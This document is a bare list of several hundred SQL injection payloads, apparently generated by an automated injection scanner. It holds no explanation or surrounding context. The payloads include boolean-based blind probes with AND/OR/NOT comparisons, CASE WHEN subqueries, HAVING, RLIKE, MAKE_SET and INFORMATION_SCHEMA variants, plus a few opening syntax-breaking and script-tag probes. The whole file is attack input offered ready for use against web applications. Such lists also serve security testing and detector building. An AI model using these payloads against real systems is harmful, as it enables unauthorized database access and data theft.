,'(.,)".))
'xxTAhy<'">AozOPi
) AND 8053=2070-- apIS
) AND 4661=3602 AND (7478=7478
)) AND 9151=6740 AND ((9677=9677
))) AND 3176=4904 AND (((8275=8275
 AND 1805=4983
 AND 7225=9521-- Ynqp
 AND 4342=7363# HKqd
' AND 5226=2348-- lVCg
') AND 8163=8964 AND ('mBOL'='mBOL
')) AND 8663=4639 AND (('mQyN'='mQyN
'))) AND 6995=2123 AND ((('ytDd'='ytDd
' AND 4369=8757 AND 'XLar'='XLar
') AND 7173=6018 AND ('ZNJz' LIKE 'ZNJz
')) AND 1534=1125 AND (('BWNF' LIKE 'BWNF
%' AND 2715=8436 AND 'cWqt%'='cWqt
' AND 5901=8764 AND 'rKTa' LIKE 'rKTa
") AND 5163=8787 AND ("UPRZ"="UPRZ
")) AND 1948=2087 AND (("IhlH"="IhlH
" AND 8143=9356 AND "EhVr"="EhVr
") AND 8548=7397 AND ("EzJw" LIKE "EzJw
" AND 6286=7259 AND "EfAK" LIKE "EfAK
' AND 5757=7370 OR 'qoJe'='JmNT
-2643
-1147) OR 8223=7380-- Rkfa
-6450) OR 7482=7482-- sPcD
-4812) OR 7498=5197 AND (2368=2368
-4307) OR 7482=7482 AND (4016=4016
-5786)) OR 7993=2214 AND ((3366=3366
-8289)) OR 7482=7482 AND ((6360=6360
-9817))) OR 4105=1107 AND (((3496=3496
-7981))) OR 7482=7482 AND (((2085=2085
-4026 OR 5631=5770
-3617 OR 7482=7482
-8030 OR 3307=5843-- XVBL
-6994 OR 7482=7482-- neBy
-3989 OR 2070=8005# Axcg
-3458 OR 7482=7482# ZKpm
-9254' OR 9578=7960-- varr
-3743' OR 7482=7482-- YgVe
-5935') OR 6481=6990 AND ('Kuuk'='Kuuk
-3307') OR 7482=7482 AND ('SSkx'='SSkx
-7993')) OR 7733=9812 AND (('mGrJ'='mGrJ
-1904')) OR 7482=7482 AND (('oQlJ'='oQlJ
-6681'))) OR 8381=8910 AND ((('FFqJ'='FFqJ
-9097'))) OR 7482=7482 AND ((('rJXn'='rJXn
-9803' OR 9293=9148 AND 'SEby'='SEby
-7176' OR 7482=7482 AND 'qLMI'='qLMI
-7746') OR 9904=4491 AND ('VdVd' LIKE 'VdVd
-5498') OR 7482=7482 AND ('EIFQ' LIKE 'EIFQ
-8765')) OR 4272=8011 AND (('OQyx' LIKE 'OQyx
-5488')) OR 7482=7482 AND (('DKFq' LIKE 'DKFq
-5688%' OR 3468=9328 AND 'aRfO%'='aRfO
-7413%' OR 7482=7482 AND 'yUOD%'='yUOD
-3332' OR 5485=1181 AND 'IxYS' LIKE 'IxYS
-7962' OR 7482=7482 AND 'vWtb' LIKE 'vWtb
-4618") OR 4417=4104 AND ("Rypz"="Rypz
-1275") OR 7482=7482 AND ("nHgw"="nHgw
-5215")) OR 5616=8081 AND (("UbCR"="UbCR
-3518")) OR 7482=7482 AND (("ZOoR"="ZOoR
-7492" OR 6890=4642 AND "zQGm"="zQGm
-1642" OR 7482=7482 AND "fRKj"="fRKj
-5046") OR 9596=5857 AND ("CMOE" LIKE "CMOE
-1577") OR 7482=7482 AND ("HzWv" LIKE "HzWv
-2821" OR 2372=8214 AND "Hjhs" LIKE "Hjhs
-1205" OR 7482=7482 AND "yQbg" LIKE "yQbg
-3710' OR 2621=7039 OR 'KDjg'='oQqG
-1312' OR 7482=7482 OR 'snNZ'='NocR
) OR NOT 4989=1361-- vylr
) OR NOT 5319=7922 AND (5996=5996
)) OR NOT 8963=4122 AND ((2705=2705
))) OR NOT 7605=1184 AND (((9497=9497
 OR NOT 8671=8714
 OR NOT 9009=3078-- SNyw
 OR NOT 4815=8780# yGEd
' OR NOT 9437=7258-- XHVo
') OR NOT 2094=5490 AND ('nsyy'='nsyy
')) OR NOT 4359=8607 AND (('bMNi'='bMNi
'))) OR NOT 1669=3270 AND ((('vdzi'='vdzi
' OR NOT 7183=4201 AND 'YOqE'='YOqE
') OR NOT 3420=2732 AND ('aLXl' LIKE 'aLXl
')) OR NOT 3985=3905 AND (('zZVk' LIKE 'zZVk
%' OR NOT 5720=4322 AND 'HSko%'='HSko
' OR NOT 6470=9108 AND 'SKvb' LIKE 'SKvb
") OR NOT 9875=5829 AND ("zayS"="zayS
")) OR NOT 9446=5384 AND (("CTUS"="CTUS
" OR NOT 1017=5192 AND "VIxV"="VIxV
") OR NOT 9242=3607 AND ("kbna" LIKE "kbna
" OR NOT 6365=3577 AND "mgWS" LIKE "mgWS
' OR NOT 6781=8688 OR 'ZwZQ'='KHbf
) AND 6252=(SELECT (CASE WHEN (6252=5467) THEN 6252 ELSE (SELECT 5467 UNION SELECT 5840) END))-- -
)) AND 3249=(SELECT (CASE WHEN (3249=3853) THEN 3249 ELSE (SELECT 3853 UNION SELECT 5247) END))-- -
))) AND 9191=(SELECT (CASE WHEN (9191=5224) THEN 9191 ELSE (SELECT 5224 UNION SELECT 8985) END))-- -
 AND 6807=(SELECT (CASE WHEN (6807=7225) THEN 6807 ELSE (SELECT 7225 UNION SELECT 6885) END))-- -
' AND 2884=(SELECT (CASE WHEN (2884=3065) THEN 2884 ELSE (SELECT 3065 UNION SELECT 7769) END))-- -
') AND 3053=(SELECT (CASE WHEN (3053=2791) THEN 3053 ELSE (SELECT 2791 UNION SELECT 2726) END))-- -
')) AND 8599=(SELECT (CASE WHEN (8599=4276) THEN 8599 ELSE (SELECT 4276 UNION SELECT 7181) END))-- -
'))) AND 1047=(SELECT (CASE WHEN (1047=8605) THEN 1047 ELSE (SELECT 8605 UNION SELECT 2136) END))-- -
%' AND 5783=(SELECT (CASE WHEN (5783=3988) THEN 5783 ELSE (SELECT 3988 UNION SELECT 2910) END))-- -
") AND 4180=(SELECT (CASE WHEN (4180=7115) THEN 4180 ELSE (SELECT 7115 UNION SELECT 2098) END))-- -
")) AND 1800=(SELECT (CASE WHEN (1800=1728) THEN 1800 ELSE (SELECT 1728 UNION SELECT 7829) END))-- -
" AND 5031=(SELECT (CASE WHEN (5031=4502) THEN 5031 ELSE (SELECT 4502 UNION SELECT 5421) END))-- -
-1274) OR 8704=(SELECT (CASE WHEN (8704=4817) THEN 8704 ELSE (SELECT 4817 UNION SELECT 1636) END))-- -
-4075) OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-3702)) OR 9326=(SELECT (CASE WHEN (9326=8061) THEN 9326 ELSE (SELECT 8061 UNION SELECT 5182) END))-- -
-8727)) OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-5969))) OR 6541=(SELECT (CASE WHEN (6541=9385) THEN 6541 ELSE (SELECT 9385 UNION SELECT 8955) END))-- -
-8926))) OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-9667 OR 3789=(SELECT (CASE WHEN (3789=9121) THEN 3789 ELSE (SELECT 9121 UNION SELECT 1510) END))-- -
-1679 OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-2324' OR 2581=(SELECT (CASE WHEN (2581=4148) THEN 2581 ELSE (SELECT 4148 UNION SELECT 8489) END))-- -
-2588' OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-1750') OR 3546=(SELECT (CASE WHEN (3546=3634) THEN 3546 ELSE (SELECT 3634 UNION SELECT 5986) END))-- -
-3434') OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-7263')) OR 6485=(SELECT (CASE WHEN (6485=5274) THEN 6485 ELSE (SELECT 5274 UNION SELECT 6387) END))-- -
-6487')) OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-3527'))) OR 2840=(SELECT (CASE WHEN (2840=7418) THEN 2840 ELSE (SELECT 7418 UNION SELECT 4642) END))-- -
-7929'))) OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-5652%' OR 5497=(SELECT (CASE WHEN (5497=4643) THEN 5497 ELSE (SELECT 4643 UNION SELECT 6558) END))-- -
-2226%' OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-2140") OR 3731=(SELECT (CASE WHEN (3731=6402) THEN 3731 ELSE (SELECT 6402 UNION SELECT 7452) END))-- -
-3845") OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-3865")) OR 7950=(SELECT (CASE WHEN (7950=7703) THEN 7950 ELSE (SELECT 7703 UNION SELECT 2115) END))-- -
-5972")) OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
-3151" OR 1361=(SELECT (CASE WHEN (1361=7728) THEN 1361 ELSE (SELECT 7728 UNION SELECT 2523) END))-- -
-8944" OR 5825=(SELECT (CASE WHEN (5825=5825) THEN 5825 ELSE (SELECT 9628 UNION SELECT 7628) END))-- -
) AND 3714=9775-- -
)) AND 2494=1140-- -
))) AND 1904=7612-- -
 AND 4337=9300-- -
' AND 9598=2339-- -
') AND 4424=3801-- -
')) AND 4933=7805-- -
'))) AND 8964=3024-- -
%' AND 7624=7604-- -
") AND 9431=8070-- -
")) AND 5933=9764-- -
" AND 4194=6359-- -
-6254) OR 7472=3281-- -
-6332) OR 4189=4189-- -
-2387)) OR 1369=4885-- -
-7067)) OR 4189=4189-- -
-4514))) OR 1963=6060-- -
-5305))) OR 4189=4189-- -
-3634 OR 7706=7327-- -
-5088 OR 4189=4189-- -
-5453' OR 3990=3800-- -
-4182' OR 4189=4189-- -
-1193') OR 7111=1229-- -
-9457') OR 4189=4189-- -
-8818')) OR 1732=3512-- -
-2903')) OR 4189=4189-- -
-6684'))) OR 8084=4614-- -
-3151'))) OR 4189=4189-- -
-7322%' OR 2103=6044-- -
-8158%' OR 4189=4189-- -
-8767") OR 7109=1995-- -
-3255") OR 4189=4189-- -
-7582")) OR 9042=9481-- -
-6838")) OR 4189=4189-- -
-1562" OR 7870=6446-- -
-9861" OR 4189=4189-- -
(SELECT (CASE WHEN (4551=8857) THEN 1 ELSE (SELECT 8857 UNION SELECT 1826) END))
(CASE WHEN (4582=5886) THEN 4582 ELSE 4582*(SELECT 4582 FROM DUAL UNION SELECT 5886 FROM DUAL) END)
(CASE WHEN 5921=1322 THEN 5921 ELSE NULL END)
) HAVING 9248=5069-- QNMo
) HAVING 8410=4901 AND (1262=1262
)) HAVING 6311=2928 AND ((9453=9453
))) HAVING 4159=3640 AND (((2704=2704
 HAVING 5516=2369
 HAVING 1779=2182-- CcZT
 HAVING 5303=2898# IYYx
' HAVING 5073=5137-- YHKc
') HAVING 4247=6492 AND ('hbLL'='hbLL
')) HAVING 8890=9282 AND (('inop'='inop
'))) HAVING 6006=3521 AND ((('JrGv'='JrGv
' HAVING 4296=9589 AND 'FVQi'='FVQi
') HAVING 7812=8643 AND ('qyMo' LIKE 'qyMo
')) HAVING 7129=8425 AND (('CJxW' LIKE 'CJxW
%' HAVING 6572=2582 AND 'qdSx%'='qdSx
' HAVING 8340=4576 AND 'paAG' LIKE 'paAG
") HAVING 8407=1383 AND ("USYk"="USYk
")) HAVING 3968=4066 AND (("KVZC"="KVZC
" HAVING 9535=9917 AND "QumI"="QumI
") HAVING 7232=9567 AND ("CJmX" LIKE "CJmX
" HAVING 3311=9940 AND "QxYJ" LIKE "QxYJ
' HAVING 8047=9817 OR 'xFsB'='AhIv
) AND 6326=9632#
)) AND 5232=6461#
))) AND 7465=5624#
 AND 2693=1028#
' AND 1429=7412#
') AND 2710=5883#
')) AND 8703=4476#
'))) AND 3372=2303#
%' AND 6383=8416#
") AND 1389=5326#
")) AND 2853=9232#
" AND 7646=6844#
-9585) OR 3590=9689#
-3705) OR 4205=4205#
-1894)) OR 8428=5998#
-9029)) OR 4205=4205#
-4904))) OR 7013=2151#
-7423))) OR 4205=4205#
-3623 OR 4597=1612#
-4620 OR 4205=4205#
-4664' OR 2884=9387#
-5945' OR 4205=4205#
-8134') OR 6541=5561#
-8012') OR 4205=4205#
-7065')) OR 4152=1195#
-3168')) OR 4205=4205#
-7602'))) OR 4481=5511#
-6468'))) OR 4205=4205#
-3403%' OR 6914=5486#
-3358%' OR 4205=4205#
-5122") OR 3015=3140#
-4164") OR 4205=4205#
-5221")) OR 3522=4600#
-5276")) OR 4205=4205#
-6552" OR 2912=8236#
-5974" OR 4205=4205#
) OR NOT 8210=2788#
)) OR NOT 6182=2949#
))) OR NOT 2339=3846#
 OR NOT 1120=1407#
' OR NOT 8773=2174#
') OR NOT 8966=8053#
')) OR NOT 3997=6754#
'))) OR NOT 9535=3160#
%' OR NOT 5434=3311#
") OR NOT 6136=6189#
")) OR NOT 8407=8580#
" OR NOT 4471=2099#
) RLIKE (SELECT (CASE WHEN (6071=6448) THEN 1 ELSE 0x28 END))-- TNms
) RLIKE (SELECT (CASE WHEN (5214=3837) THEN 1 ELSE 0x28 END)) AND (4954=4954
)) RLIKE (SELECT (CASE WHEN (6463=7857) THEN 1 ELSE 0x28 END)) AND ((8888=8888
))) RLIKE (SELECT (CASE WHEN (3559=3716) THEN 1 ELSE 0x28 END)) AND (((2118=2118
 RLIKE (SELECT (CASE WHEN (2553=5850) THEN 1 ELSE 0x28 END))
 RLIKE (SELECT (CASE WHEN (7786=2962) THEN 1 ELSE 0x28 END))-- AFOI
 RLIKE (SELECT (CASE WHEN (8344=1904) THEN 1 ELSE 0x28 END))# MMbH
' RLIKE (SELECT (CASE WHEN (3477=5548) THEN 1 ELSE 0x28 END))-- dqBG
') RLIKE (SELECT (CASE WHEN (1071=5158) THEN 1 ELSE 0x28 END)) AND ('hkbq'='hkbq
')) RLIKE (SELECT (CASE WHEN (9808=9820) THEN 1 ELSE 0x28 END)) AND (('HrYy'='HrYy
'))) RLIKE (SELECT (CASE WHEN (9524=6972) THEN 1 ELSE 0x28 END)) AND ((('BfkF'='BfkF
' RLIKE (SELECT (CASE WHEN (4642=8849) THEN 1 ELSE 0x28 END)) AND 'YGyB'='YGyB
') RLIKE (SELECT (CASE WHEN (7014=3802) THEN 1 ELSE 0x28 END)) AND ('tmpu' LIKE 'tmpu
')) RLIKE (SELECT (CASE WHEN (4147=5515) THEN 1 ELSE 0x28 END)) AND (('zwST' LIKE 'zwST
%' RLIKE (SELECT (CASE WHEN (1447=8297) THEN 1 ELSE 0x28 END)) AND 'Fisu%'='Fisu
' RLIKE (SELECT (CASE WHEN (2373=7740) THEN 1 ELSE 0x28 END)) AND 'RGCv' LIKE 'RGCv
") RLIKE (SELECT (CASE WHEN (2896=5498) THEN 1 ELSE 0x28 END)) AND ("QIZF"="QIZF
")) RLIKE (SELECT (CASE WHEN (2393=3065) THEN 1 ELSE 0x28 END)) AND (("pinn"="pinn
" RLIKE (SELECT (CASE WHEN (9680=9977) THEN 1 ELSE 0x28 END)) AND "dece"="dece
") RLIKE (SELECT (CASE WHEN (4356=4213) THEN 1 ELSE 0x28 END)) AND ("hXlT" LIKE "hXlT
" RLIKE (SELECT (CASE WHEN (8060=7210) THEN 1 ELSE 0x28 END)) AND "Zrtc" LIKE "Zrtc
' RLIKE (SELECT (CASE WHEN (7235=6291) THEN 1 ELSE 0x28 END)) OR 'VwAr'='dejF
) AND MAKE_SET(4984=3582,3582)-- HuHw
) AND MAKE_SET(4568=7131,7131) AND (2351=2351
)) AND MAKE_SET(3155=9260,9260) AND ((3315=3315
))) AND MAKE_SET(9183=2652,2652) AND (((7654=7654
 AND MAKE_SET(5624=1607,1607)
 AND MAKE_SET(5065=2307,2307)-- dsea
 AND MAKE_SET(4061=1113,1113)# MGLN
' AND MAKE_SET(6328=2620,2620)-- HqPp
') AND MAKE_SET(2427=5405,5405) AND ('ZhFO'='ZhFO
')) AND MAKE_SET(5507=4078,4078) AND (('RHHM'='RHHM
'))) AND MAKE_SET(3459=4624,4624) AND ((('ysNX'='ysNX
' AND MAKE_SET(5951=6849,6849) AND 'yGnF'='yGnF
') AND MAKE_SET(5634=1801,1801) AND ('DPJg' LIKE 'DPJg
')) AND MAKE_SET(3293=9051,9051) AND (('Fvpa' LIKE 'Fvpa
%' AND MAKE_SET(5476=6592,6592) AND 'EJbK%'='EJbK
' AND MAKE_SET(2078=8946,8946) AND 'Fadl' LIKE 'Fadl
") AND MAKE_SET(9951=1328,1328) AND ("pebq"="pebq
")) AND MAKE_SET(9361=4356,4356) AND (("WJtj"="WJtj
" AND MAKE_SET(8759=9505,9505) AND "Vvck"="Vvck
") AND MAKE_SET(6968=9553,9553) AND ("yyFM" LIKE "yyFM
" AND MAKE_SET(9887=8941,8941) AND "Llif" LIKE "Llif
' AND MAKE_SET(9442=9757,9757) OR 'ilJk'='tPKi
-2896) OR MAKE_SET(6425=3682,3682)-- UxaR
-8358) OR MAKE_SET(8663=8663,4836)-- pgAm
-7377) OR MAKE_SET(3796=6379,6379) AND (6318=6318
-1735) OR MAKE_SET(8663=8663,4836) AND (2406=2406
-6858)) OR MAKE_SET(5476=9917,9917) AND ((8926=8926
-9214)) OR MAKE_SET(8663=8663,4836) AND ((8541=8541
-2568))) OR MAKE_SET(5137=3113,3113) AND (((4691=4691
-9775))) OR MAKE_SET(8663=8663,4836) AND (((2346=2346
-5738 OR MAKE_SET(6711=5548,5548)
-8182 OR MAKE_SET(8663=8663,4836)
-9938 OR MAKE_SET(4431=3787,3787)-- piGD
-8906 OR MAKE_SET(8663=8663,4836)-- PTmC
-8331 OR MAKE_SET(9806=7086,7086)# rkyN
-7385 OR MAKE_SET(8663=8663,4836)# clCr
-4768' OR MAKE_SET(2647=2903,2903)-- LSVA
-6066' OR MAKE_SET(8663=8663,4836)-- QtEX
-4098') OR MAKE_SET(8888=8215,8215) AND ('MbSe'='MbSe
-5105') OR MAKE_SET(8663=8663,4836) AND ('eDQt'='eDQt
-1983')) OR MAKE_SET(5113=7155,7155) AND (('WrFc'='WrFc
-5929')) OR MAKE_SET(8663=8663,4836) AND (('kVJm'='kVJm
-1588'))) OR MAKE_SET(1508=2960,2960) AND ((('Pstn'='Pstn
-1067'))) OR MAKE_SET(8663=8663,4836) AND ((('qRcS'='qRcS
-8804' OR MAKE_SET(4988=4559,4559) AND 'oNAO'='oNAO
-7276' OR MAKE_SET(8663=8663,4836) AND 'Wrde'='Wrde
-5466') OR MAKE_SET(7071=3917,3917) AND ('yYCg' LIKE 'yYCg
-6649') OR MAKE_SET(8663=8663,4836) AND ('dBiL' LIKE 'dBiL
-5110')) OR MAKE_SET(7910=3504,3504) AND (('DUvu' LIKE 'DUvu
-2200')) OR MAKE_SET(8663=8663,4836) AND (('MaTf' LIKE 'MaTf
-7966%' OR MAKE_SET(9125=2582,2582) AND 'OLdo%'='OLdo
-2993%' OR MAKE_SET(8663=8663,4836) AND 'VgIM%'='VgIM
-4165' OR MAKE_SET(7067=6489,6489) AND 'SssW' LIKE 'SssW
-8823' OR MAKE_SET(8663=8663,4836) AND 'ydJB' LIKE 'ydJB
-5072") OR MAKE_SET(1409=9299,9299) AND ("VCJf"="VCJf
-9358") OR MAKE_SET(8663=8663,4836) AND ("DgjD"="DgjD
-2998")) OR MAKE_SET(7110=3854,3854) AND (("fnqu"="fnqu
-4811")) OR MAKE_SET(8663=8663,4836) AND (("zsQO"="zsQO
-5803" OR MAKE_SET(1583=3358,3358) AND "eidJ"="eidJ
-1165" OR MAKE_SET(8663=8663,4836) AND "rTOW"="rTOW
-2842") OR MAKE_SET(6901=3996,3996) AND ("NGUM" LIKE "NGUM
-8227") OR MAKE_SET(8663=8663,4836) AND ("iVrY" LIKE "iVrY
-8507" OR MAKE_SET(8715=4487,4487) AND "fSfX" LIKE "fSfX
-4797" OR MAKE_SET(8663=8663,4836) AND "yXhp" LIKE "yXhp
-1566' OR MAKE_SET(4265=8662,8662) OR 'ruII'='aPzX
-4711' OR MAKE_SET(8663=8663,4836) OR 'mDUQ'='TQyW
,(SELECT (CASE WHEN (5077=1133) THEN 1 ELSE 5077*(SELECT 5077 FROM INFORMATION_SCHEMA.PLUGINS) END))
',(SELECT (CASE WHEN (3474=5388) THEN 1 ELSE 3474*(SELECT 3474 FROM INFORMATION_SCHEMA.PLUGINS) END))-- StmL
